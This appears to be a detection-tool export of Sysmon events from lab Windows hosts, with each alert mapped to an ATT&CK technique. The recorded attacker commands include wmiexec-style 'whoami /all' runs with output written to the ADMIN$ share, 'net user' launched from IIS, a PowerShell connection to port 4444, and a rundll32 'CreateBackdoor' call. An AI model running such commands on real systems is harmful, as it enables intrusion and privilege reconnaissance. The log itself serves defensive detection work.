/c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1 C:\ IEWIN7\IEUser 365ABB72-B17F-5CC8-0000-0020C6A31E00 0x1ea3c6 0 High SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 365ABB72-B17F-5CC8-0000-001082A51E00 3572 C:\Windows\System32\mmc.exe C:\Windows\system32\mmc.exe -Embedding ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1077] Windows Admin Shares - Process - Created,1558661633.192601,2019-05-24T05:33:53.192601+04:00,,Threat,High,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\net.exe ) through command line ( net user ),1," 1 5 4 1 0 0x8000000000000000 1046 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-24 01:33:53.152 365ABB72-4A01-5CE7-0000-00102DA1AC00 788 C:\Windows\System32\net.exe 6.1.7600.16385 (win7_rtm.090713-1255) Net Command Microsoft® Windows® Operating System Microsoft Corporation net user c:\windows\system32\inetsrv\ IIS APPPOOL\DefaultAppPool 365ABB72-45C7-5CE7-0000-002092F99C00 0x9cf992 0 High SHA1=9A544E2094273741AA2D3E7EA0AF303AF2B587EA,MD5=B9A4DAC2192FD78CDA097BFA79F6E7B2,SHA256=D468E6B1B79555AC8BCE0300942FD479689EB8F159F3A399848D3BF9B9990A56,IMPHASH=B1F584304D1C7F2899A954905D8318C7 365ABB72-4A01-5CE7-0000-0010EE9DAC00 2404 C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c net user ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1082] System Information Discovery,1556656372.402964,2019-05-01T00:32:52.402964+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( whoami /all ) ,1," 1 5 4 1 0 0x8000000000000000 9829 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-04-30 20:32:51.356 365ABB72-B0F3-5CC8-0000-0010373E1D00 3328 C:\Windows\System32\whoami.exe 6.1.7600.16385 (win7_rtm.090713-1255) whoami - displays logged on user information Microsoft® Windows® Operating System Microsoft Corporation whoami /all C:\ IEWIN7\IEUser 365ABB72-B0F2-5CC8-0000-00203D311D00 0x1d313d 0 High SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274 365ABB72-B0F3-5CC8-0000-0010C43A1D00 2828 C:\Windows\System32\cmd.exe cmd.exe /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1077] Windows Admin Shares - Network,1558661633.192601,2019-05-24T05:33:53.192601+04:00,,Threat,High,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\net.exe ) through command line ( net user ),1," 1 5 4 1 0 0x8000000000000000 1046 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-24 01:33:53.152 365ABB72-4A01-5CE7-0000-00102DA1AC00 788 C:\Windows\System32\net.exe 6.1.7600.16385 (win7_rtm.090713-1255) Net Command Microsoft® Windows® Operating System Microsoft Corporation net user c:\windows\system32\inetsrv\ IIS APPPOOL\DefaultAppPool 365ABB72-45C7-5CE7-0000-002092F99C00 0x9cf992 0 High SHA1=9A544E2094273741AA2D3E7EA0AF303AF2B587EA,MD5=B9A4DAC2192FD78CDA097BFA79F6E7B2,SHA256=D468E6B1B79555AC8BCE0300942FD479689EB8F159F3A399848D3BF9B9990A56,IMPHASH=B1F584304D1C7F2899A954905D8318C7 365ABB72-4A01-5CE7-0000-0010EE9DAC00 2404 C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c net user ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1053] Scheduled Task - Process,1607121664.542909,2020-12-05T02:41:04.542909+04:00,,Threat,Low,Found User (NT AUTHORITY\LOCAL SERVICE) running image ( C:\Windows\System32\svchost.exe ) through command line ( C:\Windows\system32\svchost.exe -k localService -p -s RemoteRegistry ),1," 1 5 4 1 0 0x8000000000000000 549016 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-12-04 22:41:04.465 747F3D96-BB00-5FCA-0000-001033CD7600 8536 C:\Windows\System32\svchost.exe 10.0.17763.1 (WinBuild.160101.0800) Host Process for Windows Services Microsoft® Windows® Operating System Microsoft Corporation svchost.exe C:\Windows\system32\svchost.exe -k localService -p -s RemoteRegistry C:\Windows\system32\ NT AUTHORITY\LOCAL SERVICE 747F3D96-3407-5FCB-0000-0020E5030000 0x3e5 0 System SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69 00000000-0000-0000-0000-000000000000 612 ? ? ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1579034803.8364,2020-01-15T00:46:43.836400+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "cmd.exe" /c notepad.exe ),1," 1 5 4 1 0 0x8000000000000000 341 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-01-14 20:46:43.675 747F3D96-28B3-5E1E-0000-001032047C00 1656 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation Cmd.Exe "cmd.exe" /c notepad.exe C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-28B3-5E1E-0000-002057EB7B00 0x7beb57 0 High SHA1=08CC2E8DCA652BDDA1ACCA9C446560D4BC1BCDF9,MD5=0D088F5BCFA8F086FBA163647CD80CAB,SHA256=9023F8AAEDA4A1DA45AC477A81B5BBE4128E413F19A0ABFA3715465AD66ED5CD,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-28B3-5E1E-0000-00101DF17B00 3412 C:\Windows\System32\rundll32.exe rundll32 url.dll,OpenURL ms-browser:// ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [ T1086 ] Powershell with Suspicious Argument,1556571561.539311,2019-04-30T00:59:21.539311+04:00,,Threat,Critical,"Found User (IEWIN7\IEUser) run Suspicious PowerShell commands that include (powershell,\Windows\System32,powershell) in event with Command Line ("C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile) and Parent Image :C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe , Parent CommandLine (powershell) in directory : ( C:\Users\IEUser\Desktop\invoke-pipeshell-master\ )",1," 1 5 4 1 0 0x8000000000000000 8048 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-04-29 20:59:21.539 365ABB72-65A9-5CC7-0000-00104E5C2400 3376 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 6.1.7600.16385 (win7_rtm.090713-1255) Windows PowerShell Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile C:\Users\IEUser\Desktop\invoke-pipeshell-master\ IEWIN7\IEUser 365ABB72-5B3A-5CC7-0000-002096080100 0x10896 1 High SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C 365ABB72-6231-5CC7-0000-00104CF71800 3940 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1053] Scheduled Task - Process,1618950794.860901,2021-04-21T00:33:14.860901+04:00,,Threat,Low,Found User (NT AUTHORITY\LOCAL SERVICE) running image ( C:\Windows\System32\svchost.exe ) through command line ( C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost ),1," 1 5 4 1 0 0x8000000000000000 578505 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2021-04-20 20:33:14.246 747F3D96-3A8A-607F-0000-0010E4717700 5280 C:\Windows\System32\svchost.exe 10.0.17763.1 (WinBuild.160101.0800) Host Process for Windows Services Microsoft® Windows® Operating System Microsoft Corporation svchost.exe C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost C:\Windows\system32\ NT AUTHORITY\LOCAL SERVICE 747F3D96-82AF-607F-0000-0020E5030000 0x3e5 0 System SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69 00000000-0000-0000-0000-000000000000 612 ? ? ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1597237538.260138,2020-08-12T17:05:38.260138+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe ),1," 1 5 4 1 0 0x8000000000000000 342407 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-08-12 13:05:16.721 747F3D96-E90C-5F33-0000-0010CB420200 3320 C:\Windows\System32\cmd.exe 10.0.17763.592 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation Cmd.Exe cmd.exe C:\Windows\system32\ NT AUTHORITY\SYSTEM 747F3D96-E909-5F33-0000-0020E7030000 0x3e7 0 System SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-E909-5F33-0000-00108C580000 612 C:\Windows\System32\services.exe C:\Windows\system32\services.exe ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1086] PowerShell Process found,1556571561.539311,2019-04-30T00:59:21.539311+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile ),1," 1 5 4 1 0 0x8000000000000000 8048 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-04-29 20:59:21.539 365ABB72-65A9-5CC7-0000-00104E5C2400 3376 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 6.1.7600.16385 (win7_rtm.090713-1255) Windows PowerShell Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile C:\Users\IEUser\Desktop\invoke-pipeshell-master\ IEWIN7\IEUser 365ABB72-5B3A-5CC7-0000-002096080100 0x10896 1 High SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C 365ABB72-6231-5CC7-0000-00104CF71800 3940 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1556656513.512339,2019-05-01T00:35:13.512339+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\System32\cmd.exe" /Q /c cd 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1 ),1," 1 5 4 1 0 0x8000000000000000 9838 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-04-30 20:35:13.434 365ABB72-B181-5CC8-0000-0010ADBF1E00 3372 C:\Windows\System32\cmd.exe 6.1.7601.17514 (win7sp1_rtm.101119-1850) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\System32\cmd.exe" /Q /c cd 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1 C:\ IEWIN7\IEUser 365ABB72-B17F-5CC8-0000-0020C6A31E00 0x1ea3c6 0 High SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 365ABB72-B17F-5CC8-0000-001082A51E00 3572 C:\Windows\System32\mmc.exe C:\Windows\system32\mmc.exe -Embedding ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1556656371.371714,2019-05-01T00:32:51.371714+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 ),1," 1 5 4 1 0 0x8000000000000000 9828 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-04-30 20:32:51.324 365ABB72-B0F3-5CC8-0000-0010C43A1D00 2828 C:\Windows\System32\cmd.exe 6.1.7601.17514 (win7sp1_rtm.101119-1850) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation cmd.exe /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 C:\ IEWIN7\IEUser 365ABB72-B0F2-5CC8-0000-00203D311D00 0x1d313d 0 High SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 365ABB72-B0C0-5CC8-0000-001017C31C00 836 C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1047] Windows Management Instrumentation - Process,1556656371.371714,2019-05-01T00:32:51.371714+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 ),1," 1 5 4 1 0 0x8000000000000000 9828 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-04-30 20:32:51.324 365ABB72-B0F3-5CC8-0000-0010C43A1D00 2828 C:\Windows\System32\cmd.exe 6.1.7601.17514 (win7sp1_rtm.101119-1850) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation cmd.exe /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 C:\ IEWIN7\IEUser 365ABB72-B0F2-5CC8-0000-00203D311D00 0x1d313d 0 High SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 365ABB72-B0C0-5CC8-0000-001017C31C00 836 C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1047] Windows Management Instrumentation - Instances of an Active Script Event Consumer - Process,1556656371.371714,2019-05-01T00:32:51.371714+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 ),1," 1 5 4 1 0 0x8000000000000000 9828 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-04-30 20:32:51.324 365ABB72-B0F3-5CC8-0000-0010C43A1D00 2828 C:\Windows\System32\cmd.exe 6.1.7601.17514 (win7sp1_rtm.101119-1850) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation cmd.exe /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 C:\ IEWIN7\IEUser 365ABB72-B0F2-5CC8-0000-00203D311D00 0x1d313d 0 High SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 365ABB72-B0C0-5CC8-0000-001017C31C00 836 C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding ",IEWIN7,Microsoft-Windows-Sysmon/Operational Prohibited Process connecting to internet,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,"User (NT AUTHORITY\SYSTEM) run process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and initiated network connection from hostname ( IEWIN7 and IP ( 10.0.2.18 ) to hostname ( ) , IP ( 10.0.2.19 ) and port ( 4444 )",3," 3 5 4 3 0 0x8000000000000000 9813 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-04-30 20:26:52.794 365ABB72-AF8C-5CC8-0000-001003361900 2484 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe NT AUTHORITY\SYSTEM tcp true false 10.0.2.18 IEWIN7 49160 false 10.0.2.19 4444 ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1117] Bypassing Application Whitelisting,1579034803.819347,2020-01-15T00:46:43.819347+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 url.dll,OpenURL ms-browser://)",1," 1 5 4 1 0 0x8000000000000000 340 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-01-14 20:46:43.232 747F3D96-28B3-5E1E-0000-00101DF17B00 3412 C:\Windows\System32\rundll32.exe 10.0.17763.1 (WinBuild.160101.0800) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation RUNDLL32.EXE rundll32 url.dll,OpenURL ms-browser:// C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-28B3-5E1E-0000-002057EB7B00 0x7beb57 0 High SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A 747F3D96-28B3-5E1E-0000-0010CAEC7B00 1632 C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1053] Scheduled Task - Process,1618950794.242705,2021-04-21T00:33:14.242705+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\svchost.exe ) through command line ( C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc ),1," 1 5 4 1 0 0x8000000000000000 578503 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2021-04-20 20:33:13.680 747F3D96-3A89-607F-0000-001028587700 4912 C:\Windows\System32\svchost.exe 10.0.17763.1 (WinBuild.160101.0800) Host Process for Windows Services Microsoft® Windows® Operating System Microsoft Corporation svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc C:\Windows\system32\ NT AUTHORITY\SYSTEM 747F3D96-82AE-607F-0000-0020E7030000 0x3e7 0 System SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69 00000000-0000-0000-0000-000000000000 612 ? ? ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational "[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1579034803.819347,2020-01-15T00:46:43.819347+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 url.dll,OpenURL ms-browser:// )",1," 1 5 4 1 0 0x8000000000000000 340 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-01-14 20:46:43.232 747F3D96-28B3-5E1E-0000-00101DF17B00 3412 C:\Windows\System32\rundll32.exe 10.0.17763.1 (WinBuild.160101.0800) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation RUNDLL32.EXE rundll32 url.dll,OpenURL ms-browser:// C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-28B3-5E1E-0000-002057EB7B00 0x7beb57 0 High SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A 747F3D96-28B3-5E1E-0000-0010CAEC7B00 1632 C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1085] Rundll32 Execution detected,1579034803.819347,2020-01-15T00:46:43.819347+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 url.dll,OpenURL ms-browser:// )",1," 1 5 4 1 0 0x8000000000000000 340 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-01-14 20:46:43.232 747F3D96-28B3-5E1E-0000-00101DF17B00 3412 C:\Windows\System32\rundll32.exe 10.0.17763.1 (WinBuild.160101.0800) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation RUNDLL32.EXE rundll32 url.dll,OpenURL ms-browser:// C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-28B3-5E1E-0000-002057EB7B00 0x7beb57 0 High SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A 747F3D96-28B3-5E1E-0000-0010CAEC7B00 1632 C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1597237536.555348,2020-08-12T17:05:36.555348+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\SYSTEM32\cmd.exe /c ""C:\Program Files\Npcap\CheckStatus.bat"" ),1," 1 5 4 1 0 0x8000000000000000 342406 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-08-12 13:05:14.798 747F3D96-E90A-5F33-0000-0010863C0100 1740 C:\Windows\System32\cmd.exe 10.0.17763.592 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation Cmd.Exe C:\Windows\SYSTEM32\cmd.exe /c ""C:\Program Files\Npcap\CheckStatus.bat"" C:\Windows\system32\ NT AUTHORITY\SYSTEM 747F3D96-E909-5F33-0000-0020E7030000 0x3e7 0 System SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-E90A-5F33-0000-00102CF20000 1180 C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1117] Bypassing Application Whitelisting,1584766825.513362,2020-03-21T09:00:25.513362+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1," 1 5 4 1 0 0x8000000000000000 243562 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-03-21 05:00:25.488 747F3D96-9F69-5E75-0000-00105B9A2000 2028 C:\Windows\System32\rundll32.exe 10.0.17763.1 (WinBuild.160101.0800) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation RUNDLL32.EXE rundll32 windowscoredeviceinfo.dll,CreateBackdoor C:\Windows\system32\ NT AUTHORITY\SYSTEM 747F3D96-9DBA-5E75-0000-0020E7030000 0x3e7 0 System SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A 747F3D96-9DBC-5E75-0000-00102C390100 1652 C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1047] Windows Management Instrumentation - Process,1579034803.819347,2020-01-15T00:46:43.819347+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 url.dll,OpenURL ms-browser:// )",1," 1 5 4 1 0 0x8000000000000000 340 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-01-14 20:46:43.232 747F3D96-28B3-5E1E-0000-00101DF17B00 3412 C:\Windows\System32\rundll32.exe 10.0.17763.1 (WinBuild.160101.0800) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation RUNDLL32.EXE rundll32 url.dll,OpenURL ms-browser:// C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-28B3-5E1E-0000-002057EB7B00 0x7beb57 0 High SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A 747F3D96-28B3-5E1E-0000-0010CAEC7B00 1632 C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1047] Windows Management Instrumentation - Instances of an Active Script Event Consumer - Process,1579034803.819347,2020-01-15T00:46:43.819347+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 url.dll,OpenURL ms-browser:// )",1," 1 5 4 1 0 0x8000000000000000 340 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-01-14 20:46:43.232 747F3D96-28B3-5E1E-0000-00101DF17B00 3412 C:\Windows\System32\rundll32.exe 10.0.17763.1 (WinBuild.160101.0800) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation RUNDLL32.EXE rundll32 url.dll,OpenURL ms-browser:// C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-28B3-5E1E-0000-002057EB7B00 0x7beb57 0 High SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A 747F3D96-28B3-5E1E-0000-0010CAEC7B00 1632 C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational "[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766825.513362,2020-03-21T09:00:25.513362+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," 1 5 4 1 0 0x8000000000000000 243562 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-03-21 05:00:25.488 747F3D96-9F69-5E75-0000-00105B9A2000 2028 C:\Windows\System32\rundll32.exe 10.0.17763.1 (WinBuild.160101.0800) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation RUNDLL32.EXE rundll32 windowscoredeviceinfo.dll,CreateBackdoor C:\Windows\system32\ NT AUTHORITY\SYSTEM 747F3D96-9DBA-5E75-0000-0020E7030000 0x3e7 0 System SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A 747F3D96-9DBC-5E75-0000-00102C390100 1652 C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational Detect IIS/Exchange Exploitation,1558661633.122501,2019-05-24T05:33:53.122501+04:00,,Threat,Critical,IIS run command with user (IIS APPPOOL\DefaultAppPool) and process name (C:\Windows\System32\cmd.exe) and commandline ( 